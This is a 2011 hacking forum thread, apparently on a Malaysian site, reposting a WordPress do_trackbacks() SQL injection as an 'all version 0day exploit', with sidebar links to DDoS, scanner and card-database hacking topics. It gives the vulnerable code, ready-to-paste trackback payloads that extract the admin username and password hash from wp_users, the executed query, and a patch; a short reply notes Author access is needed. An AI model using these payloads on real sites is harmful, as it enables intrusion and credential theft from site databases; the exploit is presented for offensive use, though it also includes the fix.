Malaysian WackWall Forum

Now Malaysian Can Connect Over The World
 
HomePortalCalendarGalleryFAQSearchMemberlistUsergroupsRegisterLog in
Navigation
:: Portal ::
:: Forum ::
 :: Memberlist ::
:: Profile ::
:: FAQ ::
:: Search ::


AlertPay Easy Money Transfer 100% Free to register
 
Log in
Username:
Password:
Log in automatically: 
:: I forgot my password
Google Translator
Latest topics
» IRC Flooder Script For Sale
Mon Oct 08, 2012 12:39 am by maxi.y.mateo

» utusan.com.my Being DDOS
Fri Jan 20, 2012 5:33 pm by Penjejak Badai

» PHP IRC Bot
Fri Dec 02, 2011 11:31 am by siperda

» SQL Injection Scanner By XShimeX
Mon Oct 24, 2011 6:22 pm by sucide_bomber

» Website Vulnerable Scanner Tools V1.01 By proqrammer
Mon Oct 24, 2011 6:21 pm by sucide_bomber

» Slowloris or XerXes Leak Version
Tue Sep 13, 2011 7:45 pm by sucide_bomber

» maisarah wuz here
Tue Sep 13, 2011 7:32 pm by sucide_bomber

» Sql Injection Tutorial
Tue Jul 19, 2011 2:56 pm by sucide_bomber

» XerXes Source Codes!!
Wed Jul 13, 2011 8:55 am by wackwall

» SQL Injection dalam bahasa Malaysia
Thu Jun 30, 2011 9:11 pm by sucide_bomber

» LFI Scanner ( Perl )
Mon Jun 27, 2011 8:21 am by wackwall

» Muhasabah diri tingkat kesyukuran, keinsafan umat
Mon Jun 27, 2011 3:56 am by sucide_bomber

» 5013 Webs With SQL Vuln
Mon Jun 27, 2011 3:50 am by sucide_bomber

» Saya mencari part time job online?
Mon Jun 27, 2011 1:19 am by sucide_bomber

» 16 exploits for hacking CC databases
Mon Jun 13, 2011 1:33 pm by sucide_bomber

Link Exchange
Online News


















Churp2x Campaign
Click Pada Iklan DiBawah & Dapatkan Ganjaran Anda
SEKARANG!



















Mangga Ads
NuffNang Ads

Share | 
 

 WordPress all version 0day exploit

View previous topic View next topic Go down 
AuthorMessage
wackwall
Admin


Zodiac : Cancer Chinese zodiac : Rooster
Posts : 159
Points : 2626
Reputation : 2
Join date : 10/12/2010
Age : 35
Location Location : Sarawak

PostSubject: WordPress all version 0day exploit   Sat Feb 12, 2011 9:14 pm


Description: SQL injection vulnerability in do_trackbacks() function
of WordPress allows remote attackers to execute arbitrary SELECT SQL
query.

Access Vector: Network
Attack Complexity: Medium
Authentication: Single Instance
Confidentiality Impact: Partial
Integrity Impact: None
Availability Impact: None

UPDATE Dec 1, 2010: This vulnerability was first discovered by M4g and is described in this article.
The do_trackbacks() function in wp-includes/comment.php does not
properly escape the input that comes from the user, allowing a remote
user with publish_posts and edit_published_posts capabilities to execute
an arbitrary SELECT SQL query, which can lead to disclosure of any
information stored in the WordPress database.
Code:
function do_trackbacks($post_id) {
    global $wpdb;

    $post = $wpdb->get_row( $wpdb->prepare("SELECT * FROM $wpdb->posts WHERE ID = %d", $post_id) );
    $to_ping = get_to_ping($post_id);
    $pinged  = get_pung($post_id);
    if ( empty($to_ping) ) {
        $wpdb->update($wpdb->posts, array('to_ping' => ''), array('ID' => $post_id) );
        return;
    }

    if ( empty($post->post_excerpt) )
        $excerpt = apply_filters('the_content', $post->post_content);
    else
        $excerpt = apply_filters('the_excerpt', $post->post_excerpt);
    $excerpt = str_replace(']]>', ']]>', $excerpt);
    $excerpt = wp_html_excerpt($excerpt, 252) . '...';

    $post_title = apply_filters('the_title', $post->post_title);
    $post_title = strip_tags($post_title);

    if ( $to_ping ) {
        foreach ( (array) $to_ping as $tb_ping ) {
            $tb_ping = trim($tb_ping);
            if ( !in_array($tb_ping, $pinged) ) {
                trackback($tb_ping, $post_title, $excerpt, $post_id);
                $pinged[] = $tb_ping;
            } else {
                $wpdb->query( $wpdb->prepare("UPDATE $wpdb->posts SET to_ping = TRIM(REPLACE(to_ping, '$tb_ping', '')) WHERE ID = %d", $post_id) );
            }
        }
    }
}
The $tb_ping variable is passed to the query in line 1657 unescaped.
Exploitation. The logged in user must have publish_posts and
edit_published_posts capabilities (this corresponds to the Author role).
Below is an example of how this vulnerability can be exploited (images
below are clickable):

First, the user creates a new post (title/content does not matter); text to put into the “Send Trackbacks” field is
Code:
AAA’,”)),post_title=(select/**/concat(user_login,’|’,user_pass)/**/from/**/wp_users/**/where/**/id=1),post_content_filtered=TRIM(REPLACE(to_ping,’
and publishes it. He needs to wait a bit — for wp-cron.php to process
the trackback. The get_to_ping() function says that this trackback is
to be processed:
Code:
AAA','')),post_title=(select/**/concat(user_login,'|',user_pass)/**/from/**/wp_users/**/where/**/id=1),post_content_filtered=TRIM(REPLACE(to_ping,'
Then the user goes back and edits the post:

Now the user duplicates the text in the “Send Trackbacks” field and updates the post
Code:
AAA’,”)),post_title=(select/**/concat(user_login,’|’,user_pass)/**/from/**/wp_users/**/where/**/id=1),post_content_filtered=TRIM(REPLACE(to_ping,’
 
AAA’,”)),post_title=(select/**/concat(user_login,’|’,user_pass)/**/from/**/wp_users/**/where/**/id=1),post_content_filtered=TRIM(REPLACE(to_ping,’
The get_to_ping() function says that these trackbacks are to be processed:
Code:
AAA','')),post_title=(select/**/concat(user_login,'|',user_pass)/**/from/**/wp_users/**/where/**/id=1),post_content_filtered=TRIM(REPLACE(to_ping,'
AAA','')),post_title=(select/**/concat(user_login,'|',user_pass)/**/from/**/wp_users/**/where/**/id=1),post_content_filtered=TRIM(REPLACE(to_ping,'
Query logging shows that WordPress executes this query (reformatted for the sake of readbility):
UPDATE wp_posts
SET to_ping = TRIM(REPLACE(to_ping, 'AAA','')),post_title=(select/**/concat(user_login,'|',user_pass)/**/from/**/wp_users/**/where/**/id=1),post_content_filtered=TRIM(REPLACE(to_ping,'', ''))
WHERE ID = 11

After that when the user refreshes the page (he may need to wait a
bit for wp-cron.php to complete), he will see something like this:

Likewise, any information (login salt, nonce salt, email addresses etc) can be disclosed.
The screenshots above are for WordPress 3.0.1 but the vulnerability seems to exist since 2.x branch.
Patch: below is the patch against WordPress 3.1 rev. 16609 that fixes the vulnerability:
Likewise, any information (login salt, nonce salt, email addresses etc) can be disclosed.
The screenshots above are for WordPress 3.0.1 but the vulnerability seems to exist since 2.x branch.
Patch: below is the patch against WordPress 3.1 rev. 16609 that fixes the vulnerability:
Code:
Index: wp-includes/comment.php
===================================================================
--- wp-includes/comment.php (revision 16609)
+++ wp-includes/comment.php (working copy)
@@ -1723,7 +1723,7 @@
                trackback($tb_ping, $post_title, $excerpt, $post_id);
                $pinged[] = $tb_ping;
            } else {
-              $wpdb->query( $wpdb->prepare("UPDATE $wpdb->posts SET to_ping = TRIM(REPLACE(to_ping, '$tb_ping', '')) WHERE ID = %d", $post_id) );
+              $wpdb->query( $wpdb->prepare("UPDATE $wpdb->posts SET to_ping = TRIM(REPLACE(to_ping, %s, '')) WHERE ID = %d", $tb_ping, $post_id) );
            }
        }
    }
Back to top Go down
View user profile http://malaysia.1talk.net
masokis
New User
New User


Posts : 10
Points : 2119
Reputation : 0
Join date : 04/03/2011
Location Location : http://www.masokis.com

PostSubject: Re: WordPress all version 0day exploit   Mon Mar 07, 2011 9:43 pm

kalau dah berjaya login as admin/author.. kenapa nak exploit mcmni lagi.
kalau xde access/author admin xbleh gunalah kan?
Back to top Go down
View user profile
wackwall
Admin


Zodiac : Cancer Chinese zodiac : Rooster
Posts : 159
Points : 2626
Reputation : 2
Join date : 10/12/2010
Age : 35
Location Location : Sarawak

PostSubject: Re: WordPress all version 0day exploit   Tue Mar 08, 2011 7:49 am

no access no gain...
Back to top Go down
View user profile http://malaysia.1talk.net
Sponsored content




PostSubject: Re: WordPress all version 0day exploit   Today at 2:33 am

Back to top Go down
 
WordPress all version 0day exploit
View previous topic View next topic Back to top 
Page 1 of 1

Permissions in this forum:You cannot reply to topics in this forum
Malaysian WackWall Forum :: Internet :: Berita Tentang Internet-
Jump to: